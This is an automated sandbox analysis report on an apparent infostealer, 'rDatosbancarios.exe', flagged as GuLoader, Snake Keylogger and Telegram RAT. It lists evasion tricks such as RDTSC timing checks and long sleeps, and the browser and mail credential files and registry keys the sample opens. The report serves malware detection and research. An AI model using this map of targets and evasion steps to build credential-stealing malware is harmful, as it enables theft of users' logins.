            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE790810_2_36DE7908
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEAB0810_2_36DEAB08
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE2D3010_2_36DE2D30
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEF92810_2_36DEF928
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DEC72810_2_36DEC728
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36DE952810_2_36DE9528
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1153010_2_36E11530
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E11C1810_2_36E11C18
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1076010_2_36E10760
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1230010_2_36E12300
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1004010_2_36E10040
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E10E4810_2_36E10E48
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1E94810_2_36E1E948
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1152110_2_36E11521
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E11C0810_2_36E11C08
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1075010_2_36E10750
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E122F110_2_36E122F1
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E1001110_2_36E10011
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36E10E3810_2_36E10E38
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36F1230010_2_36F12300
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36F1044810_2_36F10448
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36F17B7010_2_36F17B70
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_36F1106010_2_36F11060
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: String function: 00402BBF appears 51 times
            Source: rDatosbancarios.exe, 00000000.00000002.2062246203.0000000000492000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedolcan.exeV vs rDatosbancarios.exe
            Source: rDatosbancarios.exe, 0000000A.00000002.3041036000.0000000000492000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedolcan.exeV vs rDatosbancarios.exe
            Source: rDatosbancarios.exe, 0000000A.00000002.3065072849.0000000033B67000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rDatosbancarios.exe
            Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.0000000003782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rDatosbancarios.exe
            Source: rDatosbancarios.exeBinary or memory string: OriginalFilenamedolcan.exeV vs rDatosbancarios.exe
            Source: rDatosbancarios.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/21@5/5
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_004033B6
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046DD
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile created: C:\Users\user\skraldemndJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeMutant created: NULL
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile created: C:\Users\user\AppData\Local\Temp\nst3D83.tmpJump to behavior
            Source: rDatosbancarios.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E9E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E8E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033EAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rDatosbancarios.exeVirustotal: Detection: 45%
            Source: rDatosbancarios.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile read: C:\Users\user\Desktop\rDatosbancarios.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile written: C:\Users\user\skraldemnd\Foreprovided\Dowl\mikrometer.iniJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: rDatosbancarios.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.2064115944.0000000004506000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile created: C:\Users\user\AppData\Local\Temp\nsp3EED.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\rDatosbancarios.exeAPI/Special instruction interceptor: Address: 474C56F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeAPI/Special instruction interceptor: Address: 2ECC56F
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\rDatosbancarios.exeRDTSC instruction interceptor: First address: 4723561 second address: 4723561 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1160D547CAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\rDatosbancarios.exeRDTSC instruction interceptor: First address: 2EA3561 second address: 2EA3561 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1160E0823Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\rDatosbancarios.exeMemory allocated: 3550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeMemory allocated: 33C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeMemory allocated: 35C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp3EED.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rDatosbancarios.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 5608Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 5608Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_0040596F
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_004064C1 FindFirstFileW,FindClose,10_2_004064C1
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 10_2_004027FB FindFirstFileW,10_2_004027FB
            Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: rDatosbancarios.exe, 0000000A.00000002.3043622105.0000000003748000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3043622105.00000000037AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\rDatosbancarios.exeAPI call chain: ExitProcess graph end nodegraph_0-4496
            Source: C:\Users\user\Desktop\rDatosbancarios.exeAPI call chain: ExitProcess graph end nodegraph_0-4503
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Users\user\Desktop\rDatosbancarios.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A0
            Source: C:\Users\user\Desktop\rDatosbancarios.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: rDatosbancarios.exe PID: 664, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\rDatosbancarios.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0000000A.00000002.3065111248.0000000033D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
